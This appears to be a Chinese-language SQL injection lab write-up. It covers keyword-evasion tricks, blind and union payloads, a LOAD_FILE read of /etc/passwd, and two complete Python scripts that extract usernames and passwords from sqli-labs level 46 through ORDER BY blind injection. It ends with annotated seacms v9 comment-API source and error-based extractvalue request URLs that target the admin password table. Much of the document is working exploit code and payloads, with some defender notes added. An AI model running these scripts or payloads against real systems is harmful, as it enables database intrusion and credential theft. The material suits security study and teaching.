seacms v9 注入管理员账号密码 + order by + limit
1:MySQL 默认存储引擎 InnoDB 自带的统计表
1,mysql.innodb_table_stats
2,mysql.innodb_index_stats
SELECT table_name FROM mysql.innodb_table_stats WHERE database_name = DATABASE();
2: 关键字做处理
- HEX编码:0x696E666F726D6174696F6E5F736368656D61
- 字符串:concat('informa','tion_scheam')
- 大小写:INforMation_Scheam
3:时间盲注
SELECT IF(ASCII(SUBSTRING(DATABASE(), 1, 1)) = 97, SLEEP(5), 0);
如果条件为真,数据库将延迟5秒才返回结果,否则立即返回。通过调整不同的字符和条件,你可以逐渐拼凑出表名(可使用python脚本破解)
4:布尔盲注(python脚本)
SELECT CASE WHEN (SELECT SUBSTRING(mysql.innodb_table_stats, 1, 1) FROM your_table LIMIT 1) = 'a' THEN 1/0 ELSE 1 END;
5:利用联合查询
SELECT id, name FROM users WHERE id = 1 UNION SELECT table_name, '' FROM your_table;
6:文件读取:
某些数据库允许从文件系统中读取文件内容(MySQL 中 LOAD_FILE 需要 FILE 权限且受 secure_file_priv 限制,按最小权限原则 Web 应用使用的数据库账号不应拥有该权限),假设你想读取 /etc/passwd
文件的内容:
SELECT LOAD_FILE('/etc/passwd');
7:以靶场第46关为例子
用Boolean盲注:
-
import requests
-
from lxml import html
-
def get_id_one(URL: str, paload: dict) -> str:
    """Send one GET request and return the first cell of the first table row.

    Args:
        URL: base URL of the lab page.
        paload: dict of query parameters; the ``sort`` key carries the ORDER BY
            expression under test.

    Returns:
        The stripped text of ``//table//tr[1]/td[1]``. Raises IndexError when the
        response contains no such cell (e.g. an error page without a table).
    """
    res = requests.get(url=URL,params=paload)
    tree = html.fromstring(res.content)
    # Only the row that sorts first is inspected: which ordering the server applied
    # is the boolean oracle the callers rely on.
    id_one = tree.xpath('//table//tr[1]/td[1]/text()')[0].strip()
    return id_one
def get_database(URL: str):
    """Recover up to 9 characters of ``database()`` via boolean-based blind injection.

    For each position ``i`` a binary search over ASCII 32..127 is run: the ``sort``
    value is an ``if(...)`` that orders by ``id`` when the character is <= mid and by
    ``username`` otherwise, and ``get_id_one`` reveals which ordering the server used.
    The name is printed, not returned.

    Args:
        URL: base URL of the lab page.

    Defender note: the root cause is an ORDER BY built from a request string; map the
    ``sort`` value onto an allowlist of column names instead of interpolating it. A burst
    of requests whose ``sort`` contains ``if(``/``substr(``/``database(`` is the
    detection signal.
    """
    # Get the database name
    s = ""
    for i in range(1,10):
        low = 32
        hight = 128
        mid = (low+hight)//2
        while(hight > low):
            paload = {"sort": f"if((greatest(ascii(substr(database(),{i},1)),{mid})={mid}),id,username) -- "}# equivalent to: the condition "character <= mid" is true
            id_one = get_id_one(URL,paload)
            if id_one=="1":
                # first row id is "1": the server sorted by id, so the character is <= mid
                hight = mid
                mid = (low + hight) // 2
            else:
                low = mid +1
                mid = (low + hight) // 2
        # loop exits with low == hight == mid: the character is found
        s+=chr(mid)
    print("数据库名称:"+s)
def get_table(URL: str):
    """Recover up to 31 characters of the comma-joined table names of schema ``security``.

    Same binary search as ``get_database``, but the payload compares with ``>``: the
    server orders by ``id`` when the character is > mid, so a first-row id of "1" moves
    the lower bound up. The result is printed, not returned.

    Args:
        URL: base URL of the lab page.

    Defender note: the request-controlled ORDER BY expression is the root cause; an
    allowlisted column name removes the oracle. Requests carrying
    ``information_schema`` in a query parameter are the detection signal.
    """
    # Get the table names
    s = ""
    for i in range(1,32):
        low = 32
        hight = 128
        mid = (low+hight)//2
        while(hight > low):
            paload = {"sort": f"if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),id,username) -- "}
            id_one = get_id_one(URL,paload)
            if id_one=="1":
                # sorted by id: the character is > mid, raise the lower bound
                low = mid +1
                mid = (low + hight) // 2
            else:
                hight = mid
                mid = (low + hight) // 2
        # low == hight == mid here: the character is found
        s+=chr(mid)
    print("表的名称:"+s)
def get_column(URL: str):
    """Recover up to 31 characters of the comma-joined column names of ``security.users``.

    Identical search strategy to ``get_table`` (``>`` comparison, first-row id "1"
    means "character > mid"); only the subquery differs. The result is printed, not
    returned.

    Args:
        URL: base URL of the lab page.
    """
    # Get the column names of the admin table
    s = ""
    for i in range(1,32):
        low = 32
        hight = 128
        mid = (low+hight)//2
        while(hight > low):
            paload = {"sort": f"if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),id,username) -- "}
            id_one = get_id_one(URL,paload)
            if id_one=="1":
                # sorted by id: the character is > mid
                low = mid +1
                mid = (low + hight) // 2
            else:
                hight = mid
                mid = (low + hight) // 2
        # low == hight == mid here: the character is found
        s+=chr(mid)
    print("列的名称:"+s)
def get_result(URl: str):
    """Recover up to 31 characters of ``group_concat(username,0x3e,password)`` from ``users``.

    Note: the parameter is spelled ``URl`` and is never read; the request goes to the
    module-level ``URL`` assigned under ``__main__``, so the argument is effectively
    ignored. The result is printed, not returned.

    Defender note: this is the step where the ORDER BY oracle becomes credential
    disclosure. Storing password hashes from a slow KDF rather than recoverable values
    limits the impact of any such dump; the injection itself is fixed by an allowlisted
    sort column.
    """
    # Get the username and password information
    s = ""
    for i in range(1,32):
        low = 32
        hight = 128
        mid = (low+hight)//2
        while(hight > low):
            paload = {"sort": f"if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),id,username) -- "}
            id_one = get_id_one(URL,paload)
            if id_one=="1":
                # sorted by id: the character is > mid
                low = mid +1
                mid = (low + hight) // 2
            else:
                hight = mid
                mid = (low + hight) // 2
        # low == hight == mid here: the character is found
        s+=chr(mid)
    print("用户名及密码信息:"+s)
if __name__ == '__main__':
    # Local lab instance (level 46). The three discovery steps are left commented out
    # and only the final extraction runs; get_result() reads this global URL directly.
    URL = "http://localhost/Less-46/"
    # get_database(URL)
    # get_table(URL)
    # get_column(URL)
    get_result(URL)
用时间盲注:
-
import requests
-
import datetime
-
def get_database(URL: str):
    """Recover up to 9 characters of ``database()`` via time-based blind injection.

    Binary search over ASCII 32..127 per position: the ``sort`` payload calls
    ``sleep(0.2)`` when the character is <= mid, and a round trip of 3 s or more is
    taken as "condition true". The sleep sits inside the ORDER BY expression, so it is
    presumably evaluated once per sorted row -- TODO confirm against the lab table.
    Prints each recovered character and the final name; returns nothing.

    Args:
        URL: base URL of the lab page.

    Defender note: repeated requests to one endpoint whose latency clusters at a fixed
    multiple of a small delay, with ``sleep(`` in a parameter, are the detection
    signal; the fix is the same allowlisted ORDER BY column.
    """
    # Get the database name
    s = ""
    for i in range(1,10):
        low = 32
        hight = 128
        mid = (low+hight)//2
        while(hight > low):
            paload = {"sort": f"if((greatest(ascii(substr(database(),{i},1)),{mid})={mid}),sleep(0.2),id) -- "}# equivalent to: the condition "character <= mid" is true
            start = datetime.datetime.now()
            # the response body is not inspected; only the elapsed time matters
            res = requests.get(url=URL, params=paload)
            end = datetime.datetime.now()
            # timedelta.seconds is the whole-second part of the elapsed time
            if (end - start).seconds >=3:
                # slow response: the character is <= mid
                hight = mid
                mid = (low + hight) // 2
            else:
                low = mid +1
                mid = (low + hight) // 2
        # low == hight == mid here: the character is found
        print(chr(mid),mid)
        s+=chr(mid)
    print("数据库名称:"+s)
def get_table(URL: str):
    """Recover up to 31 characters of the table names of schema ``security`` (time-based).

    Same search as the time-based ``get_database``, but the payload compares with
    ``>``: a slow response (>= 3 s) means the character is > mid and the lower bound
    moves up. The result is printed, not returned.

    Args:
        URL: base URL of the lab page.
    """
    # Get the table names
    s = ""
    for i in range(1,32):
        low = 32
        hight = 128
        mid = (low+hight)//2
        while(hight > low):
            paload = {"sort": f"if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),sleep(0.2),id) -- "}
            start = datetime.datetime.now()
            # only the elapsed time is used
            res = requests.get(url=URL, params=paload)
            end = datetime.datetime.now()
            if (end - start).seconds >=3:
                # slow response: the character is > mid
                low = mid +1
                mid = (low + hight) // 2
            else:
                hight = mid
                mid = (low + hight) // 2
        # low == hight == mid here: the character is found
        s+=chr(mid)
    print("表的名称:"+s)
def get_column(URL: str):
    """Recover up to 31 characters of the column names of ``security.users`` (time-based).

    Identical to the time-based ``get_table`` apart from the subquery; a slow
    response (>= 3 s) means the character is > mid. The result is printed, not
    returned.

    Args:
        URL: base URL of the lab page.
    """
    # Get the column names of the admin table
    s = ""
    for i in range(1,32):
        low = 32
        hight = 128
        mid = (low+hight)//2
        while(hight > low):
            paload = {"sort": f"if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),sleep(0.2),id) -- "}
            start = datetime.datetime.now()
            # only the elapsed time is used
            res = requests.get(url=URL, params=paload)
            end = datetime.datetime.now()
            if (end - start).seconds >=3:
                # slow response: the character is > mid
                low = mid +1
                mid = (low + hight) // 2
            else:
                hight = mid
                mid = (low + hight) // 2
        # low == hight == mid here: the character is found
        s+=chr(mid)
    print("列的名称:"+s)
def get_result(URl: str):
    """Recover up to 31 characters of ``group_concat(username,0x3e,password)`` (time-based).

    Note: the parameter is spelled ``URl`` and is never read; the request goes to the
    module-level ``URL`` assigned under ``__main__``. The false branch of this payload
    is the literal ``1`` rather than ``id`` as in the other functions. The result is
    printed, not returned.

    Defender note: storing password hashes from a slow KDF limits what such a dump is
    worth; the injection itself is fixed by an allowlisted sort column.
    """
    # Get the username and password information
    s = ""
    for i in range(1,32):
        low = 32
        hight = 128
        mid = (low+hight)//2
        while(hight > low):
            paload = {"sort": f"if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),sleep(0.2),1) -- "}
            start = datetime.datetime.now()
            # only the elapsed time is used
            res = requests.get(url=URL, params=paload)
            end = datetime.datetime.now()
            if (end - start).seconds >=3:
                # slow response: the character is > mid
                low = mid +1
                mid = (low + hight) // 2
            else:
                hight = mid
                mid = (low + hight) // 2
        # low == hight == mid here: the character is found
        s+=chr(mid)
    print("用户名及密码信息:"+s)
if __name__ == '__main__':
    # Local lab instance (level 46). The three discovery steps are left commented out
    # and only the final extraction runs; get_result() reads this global URL directly.
    URL = "http://localhost/Less-46/"
    # get_database(URL)
    # get_table(URL)
    # get_column(URL)
    get_result(URL)
8:seacmsv9实现报错注入数据:
-
<?php
session_start();
// common.php is not shown on this page. $gid, $page, $type and $rlist are read below
// without being assigned in this file, so presumably it registers request parameters
// as globals (the example request further down passes rlist[] in the query string)
// -- TODO confirm.
require_once("../../include/common.php");
// Numeric guards for the three scalar inputs. is_numeric() also accepts float and
// exponent forms; an (int) cast would be the stricter choice for values that are
// interpolated into SQL as integers.
$id = (isset($gid) && is_numeric($gid)) ? $gid : 0;
$page = (isset($page) && is_numeric($page)) ? $page : 1;
$type = (isset($type) && is_numeric($type)) ? $type : 1;
$pCount = 0;
$jsoncachefile = sea_DATA."/cache/review/$type/$id.js";
// Cache the first page of comments: serve the cached file when it already exists.
if($page<2)
{
    if(file_exists($jsoncachefile))
    {
        $json=LoadFile($jsoncachefile);
        die($json);
    }
}
// NOTE(review): ReadData() runs before $rlist is reset to an empty array below, so the
// global $rlist it reads still holds whatever was set before this point.
$h = ReadData($id,$page);
$rlist = array();
if($page<2)
{
    createTextFile($h,$jsoncachefile);
}
die($h);
function ReadData($id,$page)
{
    global $type,$pCount,$rlist;
    // Slots: [0] comment list, [1] reply list, [2] page, [3] page count, [4] page size,
    // [5] type, [6] id -- consumed positionally by FormatJson().
    $ret = array("","",$page,0,10,$type,$id);
    if($id>0)
    {
        $ret[0] = Readmlist($id,$page,$ret[4]);
        // $pCount is set as a side effect of Readmlist().
        $ret[3] = $pCount;
        // $rlist is the global that ReadReplyID() appends reply ids to; any elements it
        // held before this call are joined in unchanged.
        $x = implode(',',$rlist);
        if(!empty($x))
        {
            // NOTE(review): $x goes straight into an IN (...) clause inside Readrlist();
            // when $rlist is request-controlled this is the injection point demonstrated
            // below. Casting each element to int before the implode closes it.
            $ret[1] = Readrlist($x,1,10000);
        }
    }
    $readData = FormatJson($ret);
    return $readData;
}
function Readmlist($id,$page,$size)
{
    global $dsql,$type,$pCount,$rlist;
    $ml=array();
    if($id>0)
    {
        // Page count is returned to the caller through the global $pCount. $type and $id
        // are the is_numeric()-checked request values, interpolated into the SQL unquoted.
        $sqlCount = "SELECT count(*) as dd FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC";
        $rs = $dsql ->GetOne($sqlCount);
        $pCount = ceil($rs['dd']/$size);
        $sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC limit ".($page-1)*$size.",$size ";
        $dsql->setQuery($sql);
        $dsql->Execute('commentmlist');
        while($row=$dsql->GetArray('commentmlist'))
        {
            // Follow the reply chain; ReadReplyID() appends every visited id to the
            // global $rlist (passed by reference) and returns them as a ",id,id" suffix.
            $row['reply'].=ReadReplyID($id,$row['reply'],$rlist);
            // JSON is assembled by string concatenation; stored fields such as username
            // and msg are not escaped here (jsonescape() post-processes the whole document
            // in FormatJson()).
            $ml[]="{\"cmid\":".$row['id'].",\"uid\":".$row['uid'].",\"tmp\":\"\",\"nick\":\"".$row['username']."\",\"face\":\"\",\"star\":\"\",\"anony\":".(empty($row['username'])?1:0).",\"from\":\"".$row['username']."\",\"time\":\"".date("Y/n/j H:i:s",$row['dtime'])."\",\"reply\":\"".$row['reply']."\",\"content\":\"".$row['msg']."\",\"agree\":".$row['agree'].",\"aginst\":".$row['anti'].",\"pic\":\"".$row['pic']."\",\"vote\":\"".$row['vote']."\",\"allow\":\"".(empty($row['anti'])?0:1)."\",\"check\":\"".$row['ischeck']."\"}";
        }
    }
    $readmlist=join($ml,",");
    return $readmlist;
}
function Readrlist($ids,$page,$size)
{
    global $dsql,$type;
    $rl=array();
    // $ids is interpolated verbatim into the IN (...) list. The caller builds it with
    // implode(',', $rlist) from a global, so any non-numeric element reaches the query
    // unchanged -- this is the error-based injection point shown in the example request
    // below. Mitigation: cast every element to int before the implode
    // (array_map('intval', ...)) or bind the ids as parameters. $page and $size are
    // accepted but not used here.
    $sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND id in ($ids) ORDER BY id DESC";
    $dsql->setQuery($sql);
    $dsql->Execute('commentrlist');
    while($row=$dsql->GetArray('commentrlist'))
    {
        // Keyed by comment id; same unescaped concatenation as Readmlist(), but dtime is
        // emitted raw rather than formatted.
        $rl[]="\"".$row['id']."\":{\"uid\":".$row['uid'].",\"tmp\":\"\",\"nick\":\"".$row['username']."\",\"face\":\"\",\"star\":\"\",\"anony\":".(empty($row['username'])?1:0).",\"from\":\"".$row['username']."\",\"time\":\"".$row['dtime']."\",\"reply\":\"".$row['reply']."\",\"content\":\"".$row['msg']."\",\"agree\":".$row['agree'].",\"aginst\":".$row['anti'].",\"pic\":\"".$row['pic']."\",\"vote\":\"".$row['vote']."\",\"allow\":\"".(empty($row['anti'])?0:1)."\",\"check\":\"".$row['ischeck']."\"}";
    }
    $readrlist=join($rl,",");
    return $readrlist;
}
function ReadReplyID($gid,$cmid,&$rlist)
{
    global $dsql;
    // Walk the reply chain starting at $cmid: each visited id is added to $rlist (by
    // reference, deduplicated) and the ids are returned as a ",id,id,..." suffix.
    // $gid is passed through the recursion but never used.
    if($cmid>0)
    {
        if(!in_array($cmid,$rlist))$rlist[]=$cmid;
        // $cmid comes from the stored reply column. "$cmid>0" is a loose comparison,
        // not an integer validation, and the value is interpolated unquoted.
        $row = $dsql->GetOne("SELECT reply FROM sea_comment WHERE id=$cmid limit 0,1");
        if(is_array($row))
        {
            // NOTE: no cycle guard -- the in_array() check only prevents a duplicate
            // entry; a reply chain that loops back recurses without bound.
            $ReplyID = ",".$row['reply'].ReadReplyID($gid,$row['reply'],$rlist);
        }else
        {
            $ReplyID = "";
        }
    }else
    {
        $ReplyID = "";
    }
    return $ReplyID;
}
function FormatJson($json)
{
    // Template with positional placeholders %0%..%6% matching the slots built in
    // ReadData(): mlist, rlist, page, count, size, type, id.
    $x = "{\"mlist\":[%0%],\"rlist\":{%1%},\"page\":{\"page\":%2%,\"count\":%3%,\"size\":%4%,\"type\":%5%,\"id\":%6%}}";
    // Substituted from %6% down to %0%; the list and reply fragments are spliced in as
    // already-built JSON text.
    for($i=6;$i>=0;$i--)
    {
        $x=str_replace("%".$i."%",$json[$i],$x);
    }
    $formatJson = jsonescape($x);
    return $formatJson;
}
function jsonescape($txt)
{
    // json_encode() the whole document as one string, rewrite any "%u" to "\u" so that
    // %uXXXX sequences decode as characters, json_decode() it back to a string, then
    // strip CR and LF. It does not escape the JSON structure itself.
    $jsonescape=str_replace(chr(13),"",str_replace(chr(10),"",json_decode(str_replace("%u","\u",json_encode("".$txt)))));
    return $jsonescape;
}
输入以下sql注入:
http://127.0.0.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`', extractvalue(1, concat_ws( , \, (select user()))),@`'
但输入以下请求时:
http://127.0.0.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`
则返回结果表明注入失败。